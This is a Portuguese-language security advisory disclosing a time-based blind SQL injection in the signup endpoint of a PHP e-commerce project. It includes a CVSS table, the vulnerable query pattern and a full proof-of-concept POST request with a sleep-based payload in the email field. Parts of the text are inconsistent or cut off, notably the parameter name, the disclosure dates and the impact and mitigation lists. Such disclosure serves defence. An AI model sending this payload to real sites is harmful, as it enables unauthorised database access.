
Divulgação pública e prova de conceito para CVE-2025-61455, uma injeção SQL crítica no E-commerce Project v1.0, incluindo detalhes técnicos, PoC e recomendações de mitigação.
Data de Divulgação: 14 de outubro de 2025
ID do CVE: CVE-2025-61455
Gravidade: CRÍTICA (CVSS 9.8)
Existe uma vulnerabilidade crítica de Injeção de SQL no E-commerce Project v1.0, especificamente no endpoint signup.inc.php. A aplicação incorpora diretamente entradas de usuário não sanitizadas em consultas SQL, permitindo que atacantes não autenticados contornem a autenticação e executem comandos SQL arbitrários.
Este problema recebeu o identificador CVE-2025-61455. No momento da divulgação pública, nenhuma correção oficial estava disponível.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpA aplicação usa entrada não sanitizada diretamente em consultas SQL, sem qualquer validação de entrada ou declarações preparadas. A vulnerabilidade existe no parâmetro aid do arquivo signup.inc.php.
Um atacante pode injetar código SQL malicioso através do parâmetro de e-mail, permitindo ataques de injeção de SQL cega baseada em tempo.
Exemplo de padrão de código vulnerável:
$query = "SELECT * FROM table WHERE email='$email'";
Isso permite payloads de injeção que podem manipular a lógica da consulta e extrair dados sensíveis.
| ID CWE | Título |
|---|---|
| CWE-89 | Neutralização Incorreta de Elementos Especiais usados em um Comando SQL |
| Pontuação | Gravidade | String do Vetor |
|---|---|---|
| 9.8 | CRÍTICA | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Uma exploração bem-sucedida pode resultar em:
git clone https://github.com/Bhabishya-123/E-commerce.git
Use XAMPP/LAMP para implantar o projeto e navegue até:
http://localhost/e-commerce-main/includes/signup.inc.php
Envie a seguinte solicitação HTTP maliciosa:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
Explicação:
O parâmetro de e-mail contém um payload de injeção de SQL baseada em tempo: '+(select*from(select(sleep(20)))a)+'
Se a aplicação atrasar a resposta em 20 segundos, a injeção de SQL foi bem-sucedida.
mysqli_prepare() ou PDO).| Evento | Data |
|---|---|
| Vulnerabilidade Descoberta | 16 de setembro de 2025 |
| Divulgação Pública | 13 de outubro de 2025 |
| Correção Disponível | ❌ Não disponível na data da divulgação |
Esta vulnerabilidade foi descoberta e divulgada de forma responsável por:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Este aviso é publicado de forma independente devido à falta de resposta do fornecedor.